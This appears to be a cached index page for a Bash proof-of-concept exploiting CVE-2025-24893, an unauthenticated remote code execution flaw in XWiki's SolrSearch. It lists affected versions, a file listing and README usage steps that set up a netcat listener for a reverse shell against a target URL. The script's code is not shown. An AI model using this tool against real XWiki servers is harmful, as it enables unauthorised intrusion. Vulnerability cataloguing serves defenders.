CVE-2025-24893 PoC — XWiki Platform 安全漏洞

Source

https://github.com/mah4nzfr/CVE-2025-24893

Associated Vulnerability

Title:XWiki Platform 安全漏洞 (CVE-2025-24893)
Description:XWiki Platform是XWiki开源的一套用于创建Web协作应用程序的Wiki平台。 XWiki Platform存在安全漏洞，该漏洞源于任何来宾用户都可以通过对SolrSearch的请求，造成远程代码执行。

Description

Bash POC script for RCE vulnerability in XWiki Platform

Readme

# CVE-2025-24893
Bash POC script for RCE vulnerability in XWiki Platform  
### Example usage:
Setup a netcat listener:
```
$ nc -nvlp <Port>
```
Then run the script:
```
$ ./cve.sh <Target URL> <Listener IP> <Port>
```
### Affected versions:  
- From 5.4 up to 15.10.11
- From 16.0.0 up to 16.4.1
### Disclamer
This tool is for educational purposes only. I hold no responsibility for any misuse.

File Snapshot


 [4.0K]  /data/pocs/9c1aa1a799fd329f132c942e030ab13e9bf62f74
├── [ 778]  cve.sh
├── [1.0K]  LICENSE
└── [ 395]  README.md

0 directories, 3 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!